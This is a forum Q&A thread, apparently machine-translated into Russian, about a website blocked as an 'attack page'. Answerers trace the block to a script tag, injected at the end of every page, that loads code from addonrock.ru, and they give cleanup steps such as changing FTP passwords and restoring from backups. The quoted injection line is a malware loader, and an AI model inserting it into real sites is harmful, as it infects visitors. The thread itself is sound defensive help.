Страница сообщаемой атаки: как решить эту проблему
Мой сайт http://www.bccfalna.com/ работал нормально до 2 дней, но теперь он не открывается в Firefox/ Chrome и других браузерах и появляется ниже сообщения об ошибке
Отмеченная страница атаки!
Эта веб-страница www.bccfalna.com была объявлена страницей атаки и заблокирована в соответствии с вашими настройками безопасности.
Итак, как решить эту проблему безопасности, пожалуйста, помогите мне решить ее....
3 ответа
Ваш веб-сайт был занесен в черный список с помощью безопасного просмотра Google. Он интегрирован в Firefox, Safari и Chrome (не Internet Explorer).
Сначала проверьте, что Google Safe Browsing говорит о вашем домене на странице диагностики:
Malicious software is hosted on 1 domain(s), including addonrock.ru/
Итак, где-то у вас есть ссылка на этот домен. Действительно, на всех ваших страницах вы найдете это в конце кода, после тега html>:
<script type="text/javascript" src="http://addonrock.ru/Java.js"></script>
Ваше веб-приложение было взломано! Если вы используете приложение с открытым исходным кодом, проверьте, используете ли вы последнюю версию (проверьте также плагины). Там может быть известная уязвимость.
Вот что делать дальше:
- понять, как ваш сайт был взломан: известная уязвимость в приложении, проблема с вашим хостинг-провайдером, уязвимость в вашем коде (удаленное включение файлов и т. д.) и т. д.
- Заткнись: обнови приложение, исправь свой код и т. д.
- проверьте все ваши файлы и базы данных на наличие вредоносного кода
- восстановить безопасную резервную копию
Шаг 4 в порядке, если вы уверены, что злоумышленники не покинули черный ход. Конечно, вы никогда не можете быть уверены на 100%.... Если у вас достаточно времени и денег, используйте новый сервер для размещения вашего сайта.
Что ж, если предположить, что вы не распространяете преднамеренно вредоносное ПО, могу поспорить, что вас взломали и с вашего сайта распространяются вирусы или вредоносное ПО.
Эта страница содержит подробную информацию о том, что происходит.
Снесите все и восстановите из заведомо исправной резервной копии.
Скрипты с addonrock.ru и alienradar.ru вставляются через FTP.
Некоторые вредоносные программы для Windows получают информацию о входе в систему через FTP от Filezilla и других распространенных FTP-клиентов.
Итак, в основном:
1) Очистите ваш клиентский компьютер. 2) Измените все пароли на сервере. 3) Заменить все зараженные файлы. Если у вас нет доступа к журналу, просто замените их все.